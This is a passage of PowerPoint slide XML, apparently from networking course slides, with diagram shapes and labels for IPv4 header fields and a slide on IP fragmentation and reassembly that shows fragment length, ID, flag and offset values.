          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>upper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t> layer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22568" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5486400" y="3838575"/>
            <a:ext cx="0" cy="720725"/>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69" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4843463" y="5303838"/>
            <a:ext cx="4078287" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>32 bit destination IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22570" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4073525" y="6543675"/>
            <a:ext cx="5619750" cy="0"/>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71" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="5967413"/>
            <a:ext cx="2373313" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>Options (if any)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22572" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2805113" y="4267200"/>
            <a:ext cx="1639887" cy="865188"/>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3" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3509963" y="2819400"/>
            <a:ext cx="2535237" cy="1008063"/>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4" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3530600" y="1917700"/>
            <a:ext cx="1177925" cy="625475"/>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5" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8816975" y="2362200"/>
            <a:ext cx="1495425" cy="457200"/>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6" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9245600" y="3352800"/>
            <a:ext cx="1143000" cy="76200"/>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7" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7416800" y="3581400"/>
            <a:ext cx="2971800" cy="152400"/>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8" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6607175" y="3505200"/>
            <a:ext cx="3781425" cy="0"/>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9" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2935288" y="2819400"/>
            <a:ext cx="1263650" cy="147638"/>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52" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="2552700"/>
            <a:ext cx="2605088"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30046" tIns="65023" rIns="130046" bIns="65023">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r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>4 (IPv4) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0010</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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16E32AA4-31A4-4B47-AE89-CF9A0CB38B32}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="914400"/>
            <a:ext cx="11703050" cy="10572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IP Fragmentation and Reassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23556" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129213" y="2132013"/>
            <a:ext cx="6827837" cy="5727700"/>
            <a:chOff x="1218" y="944"/>
            <a:chExt cx="3024" cy="2537"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23563" name="Group 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1218" y="944"/>
              <a:ext cx="2676" cy="407"/>
              <a:chOff x="3006" y="1208"/>
              <a:chExt cx="2676" cy="407"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23606" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3048" y="1212"/>
                <a:ext cx="2634" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23607" name="Rectangle 6"/>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p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23608" name="Text Box 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="1208"/>
                <a:ext cx="242"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ID</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=x</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23609" name="Text Box 8"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4662" y="1220"/>
                <a:ext cx="440"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offset</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23610" name="Text Box 9"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4028" y="1220"/>
                <a:ext cx="574"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fragflag</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23611" name="Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3252" y="1208"/>
                <a:ext cx="497"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length</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=4000</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23612" name="Line 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3246" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23613" name="Line 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3750" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23614" name="Line 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4020" y="1254"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23615" name="Line 14"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4638" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23616" name="Line 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5112" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23617" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5232" y="1212"/>
                <a:ext cx="138" cy="378"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23564" name="Group 17"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1566" y="2048"/>
              <a:ext cx="2676" cy="407"/>
              <a:chOff x="3006" y="1208"/>
              <a:chExt cx="2676" cy="407"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23594" name="Rectangle 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3048" y="1212"/>
                <a:ext cx="2634" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23595" name="Rectangle 19"/>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p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23596" name="Text Box 20"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="1208"/>
                <a:ext cx="242"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ID</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=x</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23597" name="Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4662" y="1220"/>
                <a:ext cx="440"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offset</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23598" name="Text Box 22"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4028" y="1220"/>
                <a:ext cx="574"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fragflag</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23599" name="Text Box 23"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3250" y="1208"/>
                <a:ext cx="497"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length</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=1500</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23600" name="Line 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3246" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23601" name="Line 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3750" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23602" name="Line 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4020" y="1254"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23603" name="Line 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4638" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23604" name="Line 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5112" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23605" name="Rectangle 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5232" y="1212"/>
                <a:ext cx="138" cy="378"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23565" name="Group 30"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1566" y="2552"/>
              <a:ext cx="2676" cy="407"/>
              <a:chOff x="3006" y="1208"/>
              <a:chExt cx="2676" cy="407"/>
